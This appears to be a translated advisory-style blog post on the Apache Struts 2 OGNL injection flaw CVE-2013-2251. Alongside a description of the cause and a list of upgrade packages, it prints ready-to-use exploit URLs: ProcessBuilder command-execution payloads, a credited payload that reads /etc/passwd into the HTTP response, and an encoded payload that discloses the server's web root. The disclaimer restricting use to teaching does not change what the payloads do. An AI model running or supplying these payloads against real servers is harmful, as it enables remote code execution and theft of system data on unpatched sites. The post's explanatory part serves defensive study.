Struts has the remote code execution vulnerability!In this vulnerability, attackers can remotely execute malicious code by manipulating parameters.In versions earlier than struts 2.3.15.1, the values of the parameter action redirect and redirectaction are not properly filtered, resulting in ognl code execution.
Description
Affected Version struts 2.0.0-Struts 2.3.15 reporter Takeshi Terada of Mitsui bussan secure directions ctions, Inc. CVE number CVE-2013-2251
Vulnerability proof
The parameter is executed in an ognl expression.
http://host/struts2-blank/example/X.action?action:%25{3*4}http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
Code Execution
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command‘,‘goes‘,‘here‘})).start()}http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command‘,‘goes‘,‘here‘})).start()}http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{‘command‘,‘goes‘,‘here‘})).start()}
Vulnerability Principle
The struts 2 defaultactionmapper supports a method for short-circuit navigation state changes by prefixing parameters with "Action:" or "Redirect:", followed by a desired navigational target expression. this machism was intended to help with attaching navigational information to buttons within forms.
In struts 2 before 2.3.15.1 the information following "Action:", "redirect:" or "redirectaction:" is not properly sanitized. since said information will be evaluated as ognl expression against the value stack, this introduces the possibility to inject server side code.
Official Apache address
Severely affected websites in China
The following is for teaching and research purposes only. Illegal use is prohibited!
Execute any command exp. Thanks to X for providing:
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{‘cat‘,‘/etc/passwd‘})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletResponse‘),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
Burst website path exp, thanks to h4ck0r for providing:
?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
Upgrade struct2 requires the following packages
Commons-lang3-3.1.jar
Javassist-3.18.1-GA.jar
Ognl-3.0.6.jar
Struts2-core-2.3.16.jar
Struts2-spring-plugin-2.3.16.jar
Xwork-core-2.3.16.jar